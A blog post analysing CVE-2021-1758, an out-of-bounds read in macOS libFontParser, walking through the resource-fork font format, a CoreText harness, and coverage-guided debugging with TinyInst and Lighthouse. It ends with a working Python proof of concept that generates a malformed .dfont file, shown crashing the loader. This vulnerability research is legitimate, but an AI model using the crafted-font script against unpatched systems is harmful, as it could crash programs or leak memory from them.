Blog

Analysis of CVE-2021-1758 (CoreText Out-Of-Bounds Read)

References:

In February, Peter found a OOB read vulnerability in libFontParser.dylib. The latest tested version with the vulnerability is macOS Catalina 10.15.4 (19E287).

I wrote a guide earlier on setting up a testing environment.

Mac Resource Fork Font File

References:

It turns out that macOS can load something called a Mac Resource Fork font file. Looks like a legacy thing.

In short, in the past, Macintosh files are divided into a data fork and resource fork. Data fork contains data created by the user, resource fork consists of resources. It seems like on modern macOS systems, a file that has the structure of a resource fork can be used to store fonts, and there is no need for a data fork.

Resource Fork Structure

Here are some notes on the structure of a resource fork, which is better illustrated here (page 151 of the doc).

A resource fork can store multiple resources, with the whole file laid out in the following structure:

  • Resource Header - Offsets and size of the following 2 components
  • Resource Data - Yea the data for the resources
  • Resource Map - Information about where each resource is located in the file, and some extra information

Resource Header

The resource header consists of 16 bytes.

  • Offset to resource data (4 bytes)
  • Offset to resource map (4 bytes)
  • Length of resource data (4 bytes)
  • Length of resource map (4 bytes)

It seems like there can be some extra data that comes after the resource header, but I have yet to find more information about that.

Resource Data

Since there can be multiple resources in a resource file, there can be multiple resource data entries in the resource data section. Each resource data entry is simple as follows:

  • Length of following resource data (4 bytes)
  • Resource data for this resource (variable size)

As can be seen here, the resource data just contains the data. More information is kept in the resource map.

Resource Map

The resource map has a lot of fields:

  • Copy of resource header (16 bytes)
  • Handle to next resource map (4 bytes)
    • no idea what’s this
  • File reference number (4 bytes)
    • no idea what’s this
  • Resource fork attributes (2 bytes)
  • Offset from beginning of map to resource type list (2 bytes)
  • Offset from beginning of map to resource name list (2 bytes)
  • Number of types in the map minus 1 (2 bytes)
  • Resource type list (variable size)
  • Reference lists (variable size)
  • Resource name list (variable size)

The resource type list, reference list, and resource name list all contain more information about the resources stored in this resource fork file.

Resource type list

As the name suggests, this contains the resource types in the file. There can be more than one resource that share the same type, and there can be more than one type of resource stored in this file.

Each item in the resource list is as follows:

  • Resource type (4 bytes)
  • Num of resources of this type in map minus 1 (2 bytes)
  • Offset from beginning of resource type list to reference list of this type (2 bytes)

Each resource type has a corresponding reference list that contains entries for each resource of that type. The reference lists are contiguous, and have the same order as the types in the resource type list.

Reference list

As the name suggests, this list contains some offsets (references) to more information about a resource in the file.

  • Resource ID (2 bytes)
  • Offset from beginning of resource name list to resource name (2 bytes)
    • -1 if no name
  • Resource attributes (1 byte)
  • Offset from beginning of resource data to data for this resource (3 bytes)
  • Handle to resource (4 bytes)
    • No idea what’s this

Resource name list

A lot simpler than the lists before:

  • Length of following resource name (1 byte)
  • Chars of resource name (variable size)

Understanding the Target

Now, it is time to better understand the target library (libFontParser.dylib). I do so by providing some font files as input to the library, and using Lighthouse to see which part of the library has executed while loading this font file.

Harness

Firstly, with a clear understanding of the expected file structure, I try to write a harness that loads a font file, to try to reproduce the bug.

// g++ main.m -o main -framework CoreText -framework Foundation

#import <Foundation/Foundation.h>
#import <CoreText/CoreText.h>

void harness(const char* font_file)
{
    NSString *path = [NSString stringWithUTF8String:font_file];
    NSURL *url = [NSURL fileURLWithPath:path];
    NSLog(@"%@", url);

    CFArrayRef descriptors = CTFontManagerCreateFontDescriptorsFromURL((__bridge CFURLRef)url);

    if (descriptors == NULL)
        NSLog(@"Error when loading font file");
    else
        NSLog(@"Successfully loaded font file");
}

int main(int argc, const char* argv[]) {
    harness(argv[1]);
    return 0;
}

It works well 😃

$ g++ main.m -o main -framework CoreText -framework Foundation

$ ./main /Library/Fonts/Arial\ Unicode.ttf
2021-09-13 21:37:57.143 main[8872:43357] file:///Library/Fonts/Arial%20Unicode.ttf
2021-09-13 21:37:57.147 main[8872:43357] Successfully loaded font file

$ ./main main.m
2021-09-13 21:38:06.988 main[8877:43397] main.m -- file:///Users/daniellimws/coretext/
2021-09-13 21:38:07.002 main[8877:43397] Error when loading font file

Font file

from pwn import p8, p16, p32, p64, context

# res data (132 bytes)
res_data = b""
res_data += p32(128)
res_data += b"A" * 128

res_data_offset = 16
res_data_len = len(res_data)

# res map header (16 bytes (+16 later))
res_map = b""
res_map += p32(0)   # handle to next resource map
res_map += p16(0)   # file reference number
res_map += p16(0)   # fork attributes
res_map += p16(30)  # offset to res type list
res_map += p16(50)  # offset to res name list
res_map += p16(0)   # num types in map - 1

# type list (8 bytes)
res_map += b"FOND"
res_map += p16(0)       # num of res of this type - 1
res_map += p16(8)       # offset from type list start to ref list of this type

# ref list (12 bytes)
res_map += p16(1337)        # res id
res_map += p16(0)           # offset from resource name list start to res name of this res
res_map += p8(0)            # attributes
res_map += b"\x00\x00\x00"  # offset from res data start to this res data
res_map += p32(0)           # handle to resource

# res name (17 bytes)
res_map += p8(4)
res_map += b"GGWP"

res_map_offset = res_data_offset + res_data_len
res_map_len = len(res_map) + 16     # add 16 for res header later

res_header = b""
res_header += p32(res_data_offset)
res_header += p32(res_map_offset)
res_header += p32(res_data_len)
res_header += p32(res_map_len)

res_map = res_header + res_map

with open("myfont.dfont", "wb") as out:
    out.write(res_header)
    out.write(res_data)
    out.write(res_map)

Coverage

I use TinyInst to measure the library’s coverage when loading a certain font file.

To build TinyInst

git clone --recurse-submodules https://github.com/googleprojectzero/TinyInst
cd TinyInst
mkdir build
cd build
cmake ..
cmake --build .

The project README suggests to use cmake -G Xcode .., but it is likely that this doesn’t work if the macOS version is not the latest one. So just drop the -G Xcode and it works fine too.

Use TinyInst to get coverage

After building TinyInst, there will be a litecov binary in the build folder. This can be used to measure the basic block coverage in a library. In the command below, there is a few options passed to litecov:

  • -instrument_module - which module to instrument and measure coverage for
  • -target-env - extra env variables for the program
    • DYLD_INSERT_LIBRARIES=/usr/lib/libgmalloc.dylib is a way to check for any memory violations during program execution, similar to PageHeap on Windows
  • -patch_return_addresses - something that may be needed because something the program might not run properly after instrumentation
  • -coverage_file - To measure basic block coverage and write the executed basic block offsets into a file
$ sudo ~/TinyInst/build/litecov -instrument_module libFontParser.dylib -target-env DYLD_INSERT_LIBRARIES=/usr/lib/libgmalloc.dylib -patch_return_addresses -coverage_file cov.txt -- ./main /Library/Fonts/Arial\ Unicode.ttf

Instrumented module libFontParser.dylib, code size: 1277952
Process finished normally
Found 719 new offsets in libFontParser.dylib

719 basic blocks were executed while loading the Arial font.

Above, sudo is needed because of some macOS protections. Read more about it here.

Also, recently there was this tweet of a new feature in TinyInst. The -generate-unwind option seems to perform better than -patch_return_addresses. I decide to give it a try.

# using -generate_unwind
$ time sudo ~/TinyInst/build/litecov -instrument_module libFontParser.dylib -target-env DYLD_INSERT_LIBRARIES=/usr/lib/libgmalloc.dylib -generate_unwind -coverage_file cov.txt -- ./main /Library/Fonts/Arial\ Unicode.ttf
Instrumented module libFontParser.dylib, code size: 1277952
Process finished normally
Found 719 new offsets in libFontParser.dylib
sudo ~/TinyInst/build/litecov -instrument_module libFontParser.dylib      --   0.14s user 0.15s system 70% cpu 0.414 total

# using -patch_return_addresses
$ time sudo ~/TinyInst/build/litecov -instrument_module libFontParser.dylib -target-env DYLD_INSERT_LIBRARIES=/usr/lib/libgmalloc.dylib -patch_return_addresses -coverage_file cov.txt -- ./main /Library/Fonts/Arial\ Unicode.ttf
Instrumented module libFontParser.dylib, code size: 1277952
Process finished normally
Found 719 new offsets in libFontParser.dylib
sudo ~/TinyInst/build/litecov -instrument_module libFontParser.dylib      --   0.05s user 0.17s system 63% cpu 0.344 total

Hmm, maybe the scope is too small to see any meaningful results. Nevermind.

Arial vs My Font

Anyways, to compare between the coverage of loading Arial vs the font I just made:

# loading Arial
$ sudo ~/TinyInst/build/litecov -instrument_module libFontParser.dylib -target-env DYLD_INSERT_LIBRARIES=/usr/lib/libgmalloc.dylib -generate_unwind -coverage_file cov.txt -- ./main /Library/Fonts/Arial\ Unicode.ttf
Instrumented module libFontParser.dylib, code size: 1277952
Process finished normally
Found 719 new offsets in libFontParser.dylib

# loading my font
$ sudo ~/TinyInst/build/litecov -instrument_module libFontParser.dylib -target-env DYLD_INSERT_LIBRARIES=/usr/lib/libgmalloc.dylib -generate_unwind -coverage_file cov.txt -- ./main myfont
Instrumented module libFontParser.dylib, code size: 1277952
Process finished normally
Found 557 new offsets in libFontParser.dylib

719 vs 557. Not too sure what to make of this.

Use Lighthouse to visualize coverage

Numbers may be just good for comparison, but doesn’t truly tell how far the library went in terms of loading the font. It is better to load cov.txt in Lighthouse and visualize the executed code in IDA (Ghidra should work too).

According to the advisory, the backtrace of the crash is as follows:

    #0 0x7fff54430de5 in GetResourcePtrCommon (libFontParser.dylib:x86_64+0x70de5)
    #1 0x7fff54430e7b in FPRMGetIndexedResource (libFontParser.dylib:x86_64+0x70e7b)
    #2 0x7fff543c469e in TResourceForkFileReference::GetIndexedResource(unsigned int, unsigned int, short*, unsigned long*, unsigned char*) const (libFontParser.dylib:x86_64+0x469e)
    #3 0x7fff543c4626 in TResourceFileDataReference::TResourceFileDataReference(TResourceForkSurrogate const&, unsigned int, unsigned int) (libFontParser.dylib:x86_64+0x4626)
    #4 0x7fff543c454f in TResourceFileDataSurrogate::TResourceFileDataSurrogate(TResourceForkSurrogate const&, unsigned int, unsigned int) (libFontParser.dylib:x86_64+0x454f)
    #5 0x7fff54413914 in TFont::CreateFontEntities(char const*, bool, bool&, short, char const*, bool) (libFontParser.dylib:x86_64+0x53914)
    #6 0x7fff54416482 in TFont::CreateFontEntitiesForFile(char const*, bool, bool, short, char const*) (libFontParser.dylib:x86_64+0x56482)
    #7 0x7fff543c103d in FPFontCreateFontsWithPath (libFontParser.dylib:x86_64+0x103d)
    #8 0x7fff381a75ee in create_private_data_array_with_path (CoreGraphics:x86_64h+0xa5ee)
    #9 0x7fff381a730b in CGFontCreateFontsWithPath (CoreGraphics:x86_64h+0xa30b)
    #10 0x7fff381a6f56 in CGFontCreateFontsWithURL (CoreGraphics:x86_64h+0x9f56)
    #11 0x7fff39b842ad in CreateFontsWithURL(__CFURL const*, bool) (CoreText:x86_64+0xe2ad)
    #12 0x7fff39c82024 in CTFontManagerCreateFontDescriptorsFromURL (CoreText:x86_64+0x10c024)
    #13 0x10b7f1d7c in load_font_from_path(char*) (harness:x86_64+0x100001d7c)
    #14 0x10b7f2dd1 in main (harness:x86_64+0x100002dd1)
    #15 0x7fff71ce6cc8 in start (libdyld.dylib:x86_64+0x1acc8)

I want to see which functions in libFontParser.dylib were executed when loading my custom font. According to Lighthouse, these functions are executed:

i.e. pseudocode of the function has a green background after Lighthouse loads cov.txt

  • FPFontCreateFontsWithPath
  • TFont::CreateFontEntitiesForFile
  • TFont::CreateFontEntities

It stops here, and doesn’t execute the next function in the backtrace (TResourceFileDataSurrogate::TResourceFileDataSurrogate).

It seems to fail this check:

if ( v24
    || (((unsigned int)v171 ^ 'ofd.' | *(_DWORD *)((char *)&v171 + 3) ^ 'tno') == 0 || fdType == 'dfon')
    && (v25 = 1, v140 >= 0x101) )

Not too sure what values the variables hold at this point, but I would guess this is the file extension. It seems to be checking if the file extension is .dfont. After changing the file name to end with .dfont, running TinyInst and loading cov.txt into Lighthouse again, the execution indeed got a bit further.

Now, it fails at this check:

    ResourceCount = TResourceForkFileReference::GetResourceCount(v146, 'FOND');
    if ( !ResourceCount )
    {
        ...
        goto some_cleanup_and_return;
    }

Clearly this was because my resource fork file doesn’t have a resource of type 'FOND'. Oh… Seems to not be so straightforward. After changing the resource type in the file to 'FOND', coverage still doesn’t increase.

Looking deeper, the library calls TResourceForkSurrogate::TResourceForkSurrogate then TResourceForkFileReference::TResourceForkFileReference, and seems to throws an exception through __cxa_throw.

In lldb, br set -E c++ to break on all exceptions. Indeed, after continuing past some breakpoints, it throws an exception with the following backtrace:

Process 12922 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 10.1
    frame #0: 0x00007fff69c4e0f8 libc++abi.dylib`__cxa_throw
Target 0: (main) stopped.
(lldbinit) bt
* thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 10.1
  * frame #0: 0x00007fff69c4e0f8 libc++abi.dylib`__cxa_throw
    frame #1: 0x00007fff4effb29e libFontParser.dylib`TResourceForkFileReference::TResourceForkFileReference(char const*, bool) + 152
    frame #2: 0x00007fff4effb18b libFontParser.dylib`TResourceForkSurrogate::TResourceForkSurrogate(char const*, bool) + 117
    frame #3: 0x00007fff4f04a8a7 libFontParser.dylib`TFont::CreateFontEntities(char const*, bool, bool&, short, char const*, bool) + 613
    frame #4: 0x00007fff4f04b19e libFontParser.dylib`TFont::CreateFontEntities(char const*, bool, bool&, short, char const*, bool) + 2908
    frame #5: 0x00007fff4f04d483 libFontParser.dylib`TFont::CreateFontEntitiesForFile(char const*, bool, bool, short, char const*) + 263
    frame #6: 0x00007fff4eff803e libFontParser.dylib`FPFontCreateFontsWithPath + 202
    frame #7: 0x00007fff32f775ef CoreGraphics`create_private_data_array_with_path + 12
    frame #8: 0x00007fff32f7730c CoreGraphics`CGFontCreateFontsWithPath + 26
    frame #9: 0x00007fff32f76f57 CoreGraphics`CGFontCreateFontsWithURL + 359
    frame #10: 0x00007fff349542ae CoreText`CreateFontsWithURL(__CFURL const*, bool) + 222
    frame #11: 0x00007fff34a52025 CoreText`CTFontManagerCreateFontDescriptorsFromURL + 50
    frame #12: 0x0000000100003eab main`harness + 107
    frame #13: 0x0000000100003f13 main`main + 35
    frame #14: 0x00007fff6c91dcc9 libdyld.dylib`start + 1
    frame #15: 0x00007fff6c91dcc9 libdyld.dylib`start + 1

Looking into the functions that were called before the exception, it was thrown because FPRMNewMappedRefFromMappedFork returns a non-zero value.

  if (FPRMNewMappedRefFromMappedFork(...))
  {
    ...
    __cxa_throw(exception, (struct type_info *)&`typeinfo for'TException, TException::~TException);
  }

And inside FPRMNewMappedRefFromMappedFork:

res = CheckMapHeaderCommon(a1, a2);
if ( res )
{
    return res;
}

So, CheckMapHeaderCommon is the culprit. There must have been something wrong with the map header (which most likely refers to the resource map header described earlier). It must return 0 so that no exceptions are thrown.

Incidentally, if CheckMapHeaderCommon doesn’t return a non-zero value, the library will then call CheckMapCommon, which was mentioned in the advisory.

res = CheckMapHeaderCommon(a1, a2);
if ( res )
{
    return res;
}
else
{
    ...
    CheckMapCommon(...);
}

The CheckMapHeaderCommon function returns with an error right at the start.

res_map_offset = _byteswap_ulong(header[1]);
res = -199;
if ( res_map_offset <= file_len - 30 && res_map_offset - 40 <= 0xFFFFD7 )

Not paying too much attention to the comparisons yet, but the main issue here is the byteswap instruction (underlying x86 instruction is bswap) used. It converts the value to big-endian… So I need to modify my font generator script.

Not too much work with pwntools, just an extralld line at the start of the script:

context.endian = 'big'

Immediately, there is more coverage. Good stuff.

$ sudo ~/TinyInst/build/litecov -instrument_module libFontParser.dylib -target-env DYLD_INSERT_LIBRARIES=/usr/lib/libgmalloc.dylib -generate_unwind -coverage_file cov.txt -- ./main myfont.dfont

Instrumented module libFontParser.dylib, code size: 1277952
Process finished normally
Found 566 new offsets in libFontParser.dylib

Now there’s another problem, looks like the resource data must start at an offset greater than 40.

res_data_offset = _byteswap_ulong(*header);
if ( res_data_offset >= 0x28 && res_data_offset <= file_len )
{
    ...
}

So, I got to add some padding in between the resource header and resource data. After this change, more good news, Found 585 new offsets.

Loading the latest cov.txt in Lighthouse, this time, I see CheckMapCommon called. However, an exception is thrown after it. This means there is more fixing to be done.

An error is returned at the following check:

if ( num_types < 0 || res_map_end_offset < typelist + 8LL * num_types )
    return (unsigned int)-199;

Long story short, the documentation seems to be slightly wrong/misleading. At offset 24 of the resource map, instead of storing the offset of the resource type list, it stores the offset to the number of resource types, just 2 bytes before the resource type list. Alternatively, the number of resource types can be treated to be stored at the start of the resource type list.

If the above is confusing, basically, in the resource map, the value at offset+24 should be subtracted by 2 to pass the check. After this fix, 593 new offsets.

Still exception after this fix… According to the advisory, there is a value here to tamper with, to make CheckMapCommon return early without an error, skipping all the checks that come after. This also allows for the vulnerability to be triggered later.

num_types_ptr = (_WORD *)(res_map + res_type_list_offset);
num_types = __ROL2__(*num_types_ptr, 8) + 1;    // ROL2 for converting to big endian, then increment
if ( num_types <= 0 )
    return 0;

It appears that if num_types <= 0, the function will return early with 0 (success). This is easy to set. However, there is another check a bit earlier.

if ( num_types < 0 || res_map_end_offset < typelist + 8LL * num_types )
    return (unsigned int)-199;

So, the only ok value for num_types is 0. This is doable by setting it to 0xFFFF in the file, as it will be incremented later.

After changing num_types, the coverage becomes 629 new offsets. Loading cov.txt into Lighthouse, I see the program reaches GetResourcePtrCommon, the vulnerable function.

Vulnerability

The program now has managed to reach the vulnerable function at GetResourcePtrCommon. But there is some weirdness, it checks if num_types <= 0. Because earlier it was set to 0, it just returns here right at the start of the function.

_WORD *res_map;
num_types = __ROL2__(res_map[14], 8) + 1;   // res_map[14] reads a WORD from offset 24 of the resource map, i.e. num_types
...
if ( num_types <= 0 )
    return 0LL;

However, GetMapCommon seems to retrieve the value differently from GetResourcePtrCommon. The former reads the value based on the offset to the resource type list, whereas the latter reads based on a fixed offset (30).

Now, I’m quite confused, not sure if they both are supposed to be the same value… Looking at the documentation repeatedly, I don’t see any other explanation to this. Implementation mistake?

In any case, since both are read differently, I can set both to be different values, so that num_types == 0 in GetMapCommon, but num_types > 0 in GetResourcePtrCommon. (This was not reported in the advisory, so I wonder if there may be more bugs due to this?)

To achieve the above, I made a fake type list that is located at an offset different from the assumed 30. I tweaked the offsets a bit, and got the program to reach the memmove call as described in the advisory.

    res_name_entry = &res_name_list[(unsigned __int16)__ROL2__(index, 8)];
    memmove(__dst, res_name_entry, (unsigned __int8)*res_name_entry + 1LL);

Earlier in CheckMapCommon, a bunch of checks were skipped because it returned early after seeing num_types <= 0. The offset of the resource name entry was not checked. So, it is possible to read out of bounds, within the range of 65536, as the offset is a WORD.

POC

from pwn import p8, p16, p32, p64, context

RELATIVE_READ = 0x6000

context.endian = 'big'

# res data (132 bytes)
res_data = b""
res_data += p32(128)
res_data += b"A" * 128

res_data_offset = 16 + 24
res_data_len = len(res_data)

# res map header (16 bytes (+16 later))
res_map = b""
res_map += p32(0)   # handle to next resource map
res_map += p16(0)   # file reference number
res_map += p16(0)   # fork attributes
res_map += p16(38)  # offset to res type list
res_map += p16(60)  # offset to res name list
res_map += p16(0)   # num types in map - 1

# type list (8 bytes)
res_map += b"FOND"
res_map += p16(0)       # num of res of this type - 1
res_map += p16(20)       # offset from type list start to ref list of this type

# fake type list (10 bytes)
res_map += p16(0xffff)  # num types in map - 1 (dup value???)
res_map += b"FOND"
res_map += p16(0)       # num of res of this type - 1
res_map += p16(20)       # offset from type list start to ref list of this type

# ref list (12 bytes)
res_map += p16(1337)        # res id
res_map += p16(RELATIVE_READ)           # offset from resource name list start to res name of this res
res_map += p8(0)            # attributes
res_map += b"\x00\x00\x00"  # offset from res data start to this res data
res_map += p32(0)           # handle to resource

# res name (17 bytes)
res_map += p8(4)
res_map += b"GGWP"

res_map_offset = res_data_offset + res_data_len
res_map_len = len(res_map) + 16     # add 16 for res header later

res_header = b""
res_header += p32(res_data_offset)
res_header += p32(res_map_offset)
res_header += p32(res_data_len)
res_header += p32(res_map_len)

res_map = res_header + res_map

with open("myfont.dfont", "wb") as out:
    out.write(res_header)
    out.write(b"A" * 24)    # padding needed by the program
    out.write(res_data)
    out.write(res_map)
DYLD_INSERT_LIBRARIES=/usr/lib/libgmalloc.dylib ./main myfont.dfont
GuardMalloc[main-13531]: Allocations will be placed on 16 byte boundaries.
GuardMalloc[main-13531]:  - Some buffer overruns may not be noticed.
GuardMalloc[main-13531]:  - Applications using vector instructions (e.g., SSE) should work.
GuardMalloc[main-13531]: version 064535.38
2021-09-14 03:09:28.391 main[13531:102250] myfont.dfont -- file:///Users/daniellimws/coretext/
[1]    13531 segmentation fault  DYLD_INSERT_LIBRARIES=/usr/lib/libgmalloc.dylib ./main myfont.dfont

With libgmalloc, the OOB read can be confirmed.